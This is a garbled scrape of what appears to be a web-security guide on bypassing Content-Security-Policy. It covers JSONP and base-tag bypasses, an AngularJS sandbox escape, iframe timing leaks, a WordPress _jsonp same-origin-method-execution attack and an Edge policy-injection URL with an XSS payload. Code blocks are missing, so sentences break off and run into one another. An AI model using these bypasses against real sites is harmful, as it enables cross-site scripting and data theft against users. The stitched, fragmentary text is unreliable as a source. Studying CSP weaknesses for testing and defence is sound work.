Content-Security-Policy-Report-OnlyThis one won't block anything, only send reports (use in Pre environment).
script-srcis set to
selfand a particular domain which is whitelisted can be bypassed using JSONP. JSONP endpoints allow insecure callback methods which allow an attacker to perform XSS, working payload:
http://example.com/company/you can bypass the folder restriction and execute:
/js/app.js) using a Nonce, you can abuse the base tag to make it load the script from your own server achieving a XSS. If the vulnerable page is loaded with httpS, make use a httpS url in the base.
$eventobject, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the
path. This property contains an array of objects that causes the event to be executed. The last property is always the
windowobject, which we can use to perform a sandbox escape. By passing this array to the
orderByfilter, we can enumerate the array and use the last element (the
windowobject) to execute a global function, such as
alert(). The following code demonstrates this:
'unsafe-inline'means that you can execute any script inside the code (XSS can execute code) and
img-src *means that you can use in the webpage any image from any resource.
'unsafe-inline'This time you can make the victim load a page in your control via XSS with a
<iframe. This time you are going to make the victim access the page from where you want to extract information (CSRF). You cannot access the content of the page, but if somehow you can control the time the page needs to load you can extract the information you need.
https://redirectme.domain1.comand listen to
securitypolicyviolationevent which contains
blockedURIproperty containing the domain of the blocked URI. That is because the
https://redirectme.domain1.com(allowed by CSP) redirects to
https://adminsecret321.domain2.com(blocked by CSP). This makes use of undefined behavior of how to handle iframes with CSP. Chrome and Firefox behave differently regarding this.
openerobject in the payload to access the DOM of the real endpoint to abuse. For more information check:
/wp-json/wp/v2/users/1?_jsonp=datathat will reflect the data sent in the output (with the limitation of only letter, numbers and dots).
/wp-json/wp/v2/users/1?_jsonp=some_attack></script>note that this script will be loaded because it's allowed by 'self'. Moreover, and because Wordpress is installed, an attacker might abuse the SOME attack through the vulnerable callback endpoint that bypass the CSP to give more privileges to a user, install a new plugin... For more information about how to perform this attack check https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/
<link reol="dns-prefetch" href="something.com">
connect-srcpolicy of the CSP.
;_Edge would drop the entire policy. Example: http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E